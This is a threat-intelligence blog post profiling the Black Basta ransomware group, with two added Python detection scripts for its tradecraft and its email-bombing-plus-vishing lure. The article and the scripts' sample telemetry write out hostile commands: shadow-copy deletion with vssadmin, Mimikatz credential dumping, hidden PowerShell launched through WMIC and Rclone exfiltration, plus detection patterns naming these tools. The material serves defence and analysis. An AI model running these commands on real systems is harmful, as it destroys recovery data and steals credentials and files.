URL: https://flashpoint.io/blog/understanding-black-basta-ransomware/

FROM ORIGINS TO OPERATIONS: UNDERSTANDING BLACK BASTA RANSOMWARE

Since its emergence in 2022, Black Basta has targeted over 500 organizations
worldwide, leveraging sophisticated tactics to become a leading ransomware
threat. Here’s a look at their methods of operation, notable attacks, and the
potential future of this formidable cybercriminal group.

Flashpoint Intel Team
May 28, 2024

Table of Contents
What is Black Basta?
History and background
Global impact
How Black Basta attacks
Increasing sophistication and activity
Notable attacks
Financial impact
The future of Black Basta
Take action against ransomware threats


WHAT IS BLACK BASTA?

Black Basta is a ransomware group that has rapidly risen to prominence in the
cyber threat landscape since its first appearance in April 2022. Known for its
highly targeted and sophisticated attacks, Black Basta operates as a
Ransomware-as-a-Service (RaaS) enterprise. It most recently made news for
breaching over 500 organizations worldwide. Its victims have included critical
infrastructure sectors, according to a joint report by CISA and the FBI.

While some ransomware operators employ a scattergun approach, Black Basta
meticulously selects its victims to maximize each attack’s impact.

The group is believed to be composed of former members of the infamous
ransomware groups Conti and REvil. This connection is suggested by the
similarities in their tactics, techniques, and procedures (TTPs), as well as
their rapid establishment and effectiveness in the cybercriminal ecosystem. Like
other infamous ransomware groups, Black Basta’s operations are characterized by
their use of double extortion tactics, where they encrypt a victim’s data and
threaten to release sensitive information on their public leak site if the
ransom is not paid.


HISTORY AND BACKGROUND

Black Basta made its public debut with a series of attacks in late April 2022,
about two months after Conti's internal chats were leaked in February 2022 and
that group began to wind down. One of its earliest victims was the German wind
energy company Deutsche Windtechnik. However, there are indications that the
group may have been active as early as February 2022.

Since its inception, Black Basta has been highly active, amassing over 500
victims as of May 2024. The group utilizes top-tier hacking forums such as
Exploit and XSS to seek insiders within target organizations to facilitate
administrative access to networks.

Number of victim posts published by Black Basta by month since April 2022.
Source: Flashpoint.


GLOBAL IMPACT

Black Basta’s reach and impact are substantial, with the group targeting various
sectors, including critical infrastructure. The group primarily targets
organizations in the United States, Japan, Canada, the United Kingdom,
Australia, and New Zealand.

According to a joint advisory from the Cybersecurity and Infrastructure Security
Agency (CISA), the Federal Bureau of Investigation (FBI), the Department of
Health and Human Services (HHS), and the Multi-State Information Sharing and
Analysis Center (MS-ISAC), Black Basta has compromised over 500 organizations
worldwide. Their victims span 12 out of 16 critical infrastructure sectors,
including healthcare, public health, and energy.


HOW BLACK BASTA ATTACKS

Black Basta’s operations are characterized by their sophisticated and methodical
approach to ransomware attacks. The group leverages a combination of advanced
techniques and tools to infiltrate, compromise, and extort their targets.


INITIAL ACCESS

Black Basta employs several strategies to gain initial access to target
networks:

 * Spear-Phishing Campaigns: In its early campaigns, Black Basta used highly
   targeted spear-phishing emails to trick individuals into divulging their
   credentials or downloading malicious attachments.
 * Insider Information: The group is known to use illicit forums like Exploit
   and XSS to recruit insiders within target organizations, offering significant
   financial incentives for network access.
 * Buying Network Access: Black Basta has advertised on forums their intent to
   purchase corporate network access, collaborating with initial access brokers
   (IABs) to infiltrate target systems.

Ransomware text that is installed following encryption. (Source: Minerva Labs)




LATERAL MOVEMENT AND CREDENTIAL HARVESTING

Once inside a network, Black Basta employs a range of tactics to move laterally
and harvest credentials:

 * QakBot (QBot): Black Basta has used QakBot to steal credentials and gather
   information. QakBot is a versatile malware family that can brute-force
   credentials, perform web injects, and load other malware; its botnet was
   taken down by an international law-enforcement operation in August 2023.
 * Mimikatz: This tool is used for credential dumping, extracting passwords and
   hashes from the memory of the LSASS process.
 * Exploiting Vulnerabilities: The group exploits known vulnerabilities such as
   ZeroLogon (CVE-2020-1472), NoPac (CVE-2021-42278 and CVE-2021-42287), and
   PrintNightmare (CVE-2021-34527) to escalate privileges within the network.
 * Native Windows Tools: Black Basta uses Windows Management Instrumentation
   (WMI), PowerShell, and PsExec to execute commands and move laterally across
   the network; because these are legitimate administrative tools, detection
   depends on context rather than on the binaries themselves.


COMMAND AND CONTROL (C2)

For maintaining control over compromised systems, Black Basta uses various tools
and methods:

 * Cobalt Strike Beacons: This commercial penetration testing tool is frequently
   used for C2 operations, allowing the attackers to manage compromised systems
   remotely.
 * SystemBC: A SOCKS5 proxy and backdoor used to tunnel C2 traffic and hide the
   attackers' infrastructure from network monitoring.
 * Rclone: Strictly an exfiltration tool rather than C2, but its transfers to
   cloud storage providers use the same outbound channels and should be
   monitored alongside C2 traffic.


DATA EXFILTRATION AND ENCRYPTION

Before encrypting files, Black Basta takes steps to maximize their leverage:

 * Disabling Security Tools: The group uses PowerShell scripts to disable
   antivirus products and endpoint detection and response (EDR) tools.
 * Deleting Shadow Copies: To prevent recovery, they delete shadow copies using
   the command “vssadmin.exe delete shadows /all /quiet”.
 * Data Exfiltration: Tools like Rclone and WinSCP are used to exfiltrate
   sensitive data before encryption.


ENCRYPTION

To ensure maximum disruption, they meticulously execute the encryption phase:

 * Encryption Payload: Black Basta’s ransomware payload encrypts files using the
   XChaCha20 algorithm. They have transitioned from using the GNU Multiple
   Precision Arithmetic Library (GMP) to the Crypto++ encryption library.
 * File Extensions and Ransom Note: Encrypted files are appended with a “.basta”
   extension. A ransom note, typically named “readme.txt”, is placed on the
   victim’s desktop, directing them to a .onion site for ransom negotiations.
 * Advanced Obfuscation: The latest versions of their ransomware use heavy
   obfuscation and randomized filenames to evade detection by EDR products.
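
The chain described across the sections above (remote execution with PsExec and WMI, Mimikatz credential dumping, shadow-copy deletion, Rclone exfiltration, and the ".basta" extension beside a "readme.txt" note) maps onto a small set of endpoint detections. The following is an added example written for this page, not Flashpoint's code or anything recovered from the group's tooling; the event schema, the rule thresholds and all sample telemetry are constructed assumptions. It runs over process-creation records and flags hosts where several stages fire together, which is the point: "vssadmin delete shadows" on its own is something backup administrators run, but combined with credential dumping and Rclone on the same host it almost never is.

```python
"""Detection logic for the Black Basta tradecraft described above: shadow-copy
deletion, PsExec/WMI remote execution, Mimikatz credential dumping, Rclone
exfiltration, and the .basta/readme.txt encryption artifacts. Added example,
not Flashpoint's code; the event schema and all sample telemetry are
constructed for illustration."""
import ntpath
import re
from collections import defaultdict
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    """Minimal process-creation record (Sysmon event 1 / 4688 shape, assumed)."""
    host: str
    user: str
    image: str      # full path of the executable
    cmdline: str
    parent: str


# Each rule maps one stage of the chain to a predicate over a ProcEvent.
RULES = [
    # Inhibit system recovery: the exact vssadmin invocation the group uses.
    ("shadow_copy_deletion", lambda e: "vssadmin" in e.image.lower()
        and "delete" in e.cmdline.lower() and "shadows" in e.cmdline.lower()),
    # Lateral movement: PsExec, or WMIC spawning a process on another node.
    ("remote_exec_psexec_wmi", lambda e: re.search(r"psexec(64)?\.exe$", e.image, re.I) is not None
        or ("wmic" in e.image.lower() and "/node:" in e.cmdline.lower()
            and "process call create" in e.cmdline.lower())),
    # Credential dumping: Mimikatz binary name or its module syntax.
    ("credential_dumping", lambda e: "mimikatz" in e.image.lower()
        or re.search(r"sekurlsa::|lsadump::", e.cmdline, re.I) is not None),
    # Exfiltration: Rclone pushing local data to a remote backend.
    ("rclone_exfiltration", lambda e: "rclone" in e.image.lower()
        and re.search(r"\b(copy|sync|move)\b", e.cmdline, re.I) is not None),
]


def match_rules(events):
    """Return (rule_name, event) for every event that trips a rule, in input order."""
    return [(name, e) for e in events for name, pred in RULES if pred(e)]


def hosts_with_chain(events, min_stages=2):
    """Hosts on which at least `min_stages` distinct stages fired. A single
    rule is noisy (backup admins run vssadmin, sysadmins run PsExec); several
    stages on one host rarely are."""
    stages = defaultdict(set)
    for name, e in match_rules(events):
        stages[e.host].add(name)
    return {h: sorted(s) for h, s in stages.items() if len(s) >= min_stages}


def encryption_artifacts(paths):
    """Directories that contain both '.basta' files and a readme.txt ransom
    note, i.e. where the encryption phase has already run."""
    by_dir = defaultdict(set)
    for p in paths:
        d, f = ntpath.split(p)
        if f.lower().endswith(".basta"):
            by_dir[d].add("encrypted")
        elif f.lower() == "readme.txt":
            by_dir[d].add("note")
    return sorted(d for d, kinds in by_dir.items() if kinds == {"encrypted", "note"})


# Constructed sample telemetry: benign admin activity mixed with the chain.
SAMPLE_EVENTS = [
    ProcEvent("WS01", "corp\\jdoe", r"C:\Windows\System32\vssadmin.exe",
              "vssadmin.exe delete shadows /all /quiet", r"C:\Windows\System32\cmd.exe"),
    ProcEvent("WS01", "corp\\jdoe", r"C:\Windows\System32\vssadmin.exe",
              "vssadmin list shadows", r"C:\Windows\System32\cmd.exe"),
    ProcEvent("SRV02", "corp\\svc_backup", r"C:\Tools\PsExec64.exe",
              r"PsExec64.exe \\FS01 -s cmd /c update.bat", r"C:\Windows\System32\cmd.exe"),
    ProcEvent("SRV02", "corp\\svc_backup", r"C:\Windows\System32\wbem\WMIC.exe",
              'wmic /node:FS01 process call create "powershell -nop -w hidden"',
              r"C:\Windows\System32\cmd.exe"),
    ProcEvent("SRV02", "corp\\svc_backup", r"C:\Users\Public\rclone.exe",
              r"rclone.exe copy E:\Finance remote:backup --transfers 32",
              r"C:\Windows\System32\cmd.exe"),
    ProcEvent("SRV02", "corp\\svc_backup", r"C:\Users\Public\x64\mimikatz.exe",
              "mimikatz.exe privilege::debug sekurlsa::logonpasswords exit",
              r"C:\Windows\System32\cmd.exe"),
    ProcEvent("WS07", "corp\\asmith", r"C:\Program Files\7-Zip\7z.exe",
              "7z.exe a report.7z report.docx", r"C:\Windows\explorer.exe"),
]

SAMPLE_PATHS = [
    r"E:\Finance\Q1\budget.xlsx.basta",
    r"E:\Finance\Q1\readme.txt",
    r"E:\Finance\Q2\forecast.xlsx",
    r"C:\Users\jdoe\Desktop\readme.txt",   # a lone readme.txt is not evidence
]

if __name__ == "__main__":
    for name, e in match_rules(SAMPLE_EVENTS):
        print(f"{e.host:6} {name:24} {e.cmdline}")
    print("chain hosts:", hosts_with_chain(SAMPLE_EVENTS))
    print("encrypted dirs:", encryption_artifacts(SAMPLE_PATHS))
```

Run stand-alone it prints the individual rule hits, the hosts where two or more stages fired (only SRV02 in the sample, since WS01's lone shadow-copy deletion does not clear the bar) and the directories that show both encrypted files and a ransom note. In production the same predicates belong in the EDR or SIEM as time-windowed rules, with the parent-process field used to catch the cmd.exe and batch-script parents the group favors.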


INCREASING SOPHISTICATION AND ACTIVITY

Black Basta continuously evolves its techniques to stay ahead of security
measures. Recently, the group has combined email bombing (sometimes described as
email DDoS) with vishing (voice phishing). They flood targets with spam and
subscription emails and then call them posing as IT support, convincing them to
install remote access tools like AnyDesk or to start a Windows Quick Assist
session. Once access is gained, Black Basta runs batch scripts disguised as
legitimate updates to establish persistence and exfiltrates harvested
credentials using Secure Copy Protocol (SCP).
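
The email-bombing and vishing sequence above has a detectable shape: a mailbox is flooded, and within hours the same user launches Quick Assist or AnyDesk. As an added example, not Flashpoint's code, here is that correlation in Python over constructed mail-gateway and process telemetry; the 50-messages-per-hour threshold, the six-hour lookahead, the log schema and the mailbox-to-account mapping are all assumptions to tune for your environment.

```python
"""Email-bombing plus vishing detection: flag mailboxes that receive a burst of
mail, then look for a remote-assistance tool (Quick Assist, AnyDesk) started by
that user shortly afterwards. Added example, not Flashpoint's code; the log
schema, thresholds and all sample data are constructed for illustration."""
import ntpath
from collections import defaultdict, deque
from dataclasses import dataclass
from datetime import datetime, timedelta


@dataclass(frozen=True)
class MailEvent:
    ts: datetime
    recipient: str
    sender: str


@dataclass(frozen=True)
class ProcEvent:
    ts: datetime
    host: str
    user: str
    image: str


# Tools the group talks victims into running. Quick Assist ships with Windows,
# so the process alone is benign; its timing relative to the bombing is not.
REMOTE_ASSIST_IMAGES = {"quickassist.exe", "anydesk.exe"}


def email_bursts(mails, window=timedelta(minutes=60), threshold=50):
    """Return {recipient: burst_start} for every mailbox that received at
    least `threshold` messages inside some `window`-long sliding window."""
    by_rcpt = defaultdict(list)
    for m in mails:
        by_rcpt[m.recipient].append(m.ts)
    bursts = {}
    for rcpt, times in by_rcpt.items():
        recent = deque()
        for t in sorted(times):
            recent.append(t)
            while t - recent[0] > window:      # drop messages that fell out of the window
                recent.popleft()
            if len(recent) >= threshold:
                bursts[rcpt] = recent[0]
                break
    return bursts


def correlate_vishing(mails, procs, user_of, lookahead=timedelta(hours=6), **burst_kw):
    """For each bombed mailbox, find remote-assistance tools started by the
    matching account within `lookahead` of the burst. `user_of` maps mailbox
    address to the Windows account seen in process telemetry."""
    alerts = []
    for rcpt, start in email_bursts(mails, **burst_kw).items():
        account = user_of.get(rcpt)
        for p in procs:
            if (p.user == account
                    and ntpath.basename(p.image).lower() in REMOTE_ASSIST_IMAGES
                    and start <= p.ts <= start + lookahead):
                alerts.append((rcpt, p.host, ntpath.basename(p.image), p.ts))
    return alerts


# Constructed sample data: jdoe gets 120 list subscriptions in half an hour and
# launches Quick Assist 50 minutes later; asmith gets normal mail and runs
# AnyDesk hours later for unrelated reasons; a second Quick Assist run by jdoe
# falls outside the lookahead and must not alert.
T0 = datetime(2024, 5, 20, 9, 0)
SAMPLE_MAIL = [MailEvent(T0 + timedelta(seconds=15 * i), "jdoe@example.com",
                         f"noreply{i}@list{i % 9}.example") for i in range(120)]
SAMPLE_MAIL += [MailEvent(T0 + timedelta(minutes=10 * i), "asmith@example.com",
                          "colleague@example.com") for i in range(4)]
SAMPLE_PROCS = [
    ProcEvent(T0 + timedelta(minutes=50), "WS01", "corp\\jdoe", r"C:\Windows\System32\quickassist.exe"),
    ProcEvent(T0 + timedelta(hours=8), "WS07", "corp\\asmith", r"C:\Program Files (x86)\AnyDesk\AnyDesk.exe"),
    ProcEvent(T0 + timedelta(hours=7), "WS01", "corp\\jdoe", r"C:\Windows\System32\quickassist.exe"),
]
USER_OF = {"jdoe@example.com": "corp\\jdoe", "asmith@example.com": "corp\\asmith"}

if __name__ == "__main__":
    for rcpt, host, tool, ts in correlate_vishing(SAMPLE_MAIL, SAMPLE_PROCS, USER_OF):
        print(f"ALERT {ts:%H:%M} {rcpt} bombed, then {tool} started on {host}")
```

The negative cases matter as much as the alert: asmith's AnyDesk start is ignored because that mailbox was never bombed, and jdoe's second Quick Assist launch seven hours on falls outside the lookahead. Where Quick Assist is not a sanctioned support channel, the cleaner control is to remove or block it and alert on any launch, which collapses this correlation to a single process event.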

Black Basta has also expanded beyond Windows with a Linux build that targets
VMware ESXi hosts and the virtual machines they run, using the ChaCha20
encryption algorithm. According to recent intelligence and advisories from
agencies like CISA and the FBI, Black Basta is becoming increasingly
sophisticated in its attacks. The group has been linked to FIN7, a long-running
financially motivated threat group, indicating a possible collaboration or
shared resources. Their use of advanced techniques and tools, combined with
their ability to adapt quickly, makes them a formidable threat in the
cybersecurity landscape.


NOTABLE ATTACKS


HYUNDAI MOTOR EUROPE (JANUARY 2024)

One of Black Basta's most significant attacks targeted Hyundai Motor Europe in
early 2024, causing operational disruption and a data breach within Hyundai's
European operations.


CAPITA (MARCH 2023)

UK-based outsourcing firm Capita fell victim to a Black Basta ransomware attack
in March 2023, which it reported directly cost it approximately $32 million.
The company also disclosed that indirect losses related to the attack, such as
goodwill impairment, added upwards of $100 million.


TORONTO PUBLIC LIBRARY (OCTOBER 2023)

The Toronto Public Library faced significant outages due to a Black Basta
ransomware attack that disrupted library services and affected access to public
resources.


CHILEAN GOVERNMENT CUSTOMS AGENCY (OCTOBER 2023)

The Chilean government issued a warning following a ransomware attack by Black
Basta on its customs agency. They reported that thanks to the work of their IT
teams, the incident would not affect the operational continuity of the Service.


THE AMERICAN DENTAL ASSOCIATION (APRIL 2022)

The American Dental Association experienced an attack from Black Basta that
forced them to take affected systems offline. The attack disrupted online
services, telephones, email, and webchat.


FINANCIAL IMPACT

Black Basta’s attacks have had profound effects on various sectors, including
automotive, outsourcing, public services, government, healthcare, and
telecommunications. Their attacks typically involve both encrypting data and
exfiltrating sensitive information. They hold this information hostage and
threaten to release it publicly unless they receive the ransom. This double
extortion tactic significantly increases the pressure on victims to comply with
ransom demands.

In late 2023, it was reported that Black Basta had accumulated at least $107
million in Bitcoin ransom payments.


THE FUTURE OF BLACK BASTA

Black Basta is poised to remain a significant ransomware threat, driven by their
ability to adapt and innovate. They are likely to continue refining their attack
methods, increasing their use of sophisticated social engineering tactics such
as email DDoS and vishing to gain access to networks. The incorporation of
advanced malware and the targeting of diverse platforms, including cloud
environments and IoT devices, are expected to enhance their capabilities.

Financial incentives remain a powerful motivator for Black Basta. With over $107
million in ransom payments, ransomware continues to be highly lucrative.
Collaboration with other cybercriminal groups could become more structured,
leading to the formation of ransomware cartels. These alliances might result in
more coordinated attacks and the sharing of advanced tools and techniques. Black
Basta's connection with FIN7, a long-running financially motivated crime group,
suggests access to custom tooling and expertise developed outside the usual RaaS
ecosystem.

Law enforcement actions and improved defensive measures will also influence the
future of Black Basta. Intensified efforts by agencies like CISA and the FBI
could disrupt their operations, forcing the group to adapt or rebrand. As
organizations enhance their cybersecurity defenses, Black Basta will need to
innovate continuously to overcome these improved measures.


TAKE ACTION AGAINST RANSOMWARE THREATS

Flashpoint helps organizations deeply understand malware capabilities, origins,
and associated communication channels, along with tracking ransomware groups’
primary source communications, announcements about new victims, and trends
across victims, industries and locations. Gain insights into criminal
activities, dark web forums, and marketplaces, and expose the whereabouts of
threat actors, information leaks, encrypted chats, ransomware data leak sites,
vulnerabilities and victim auction marketplaces.  

Discover how Flashpoint’s advanced threat intelligence and comprehensive
security solutions can safeguard your critical assets. Don’t wait for an
attack—be proactive and prepared. Sign up for a demo to see Flashpoint in
action.


© 2024 Flashpoint. All rights reserved.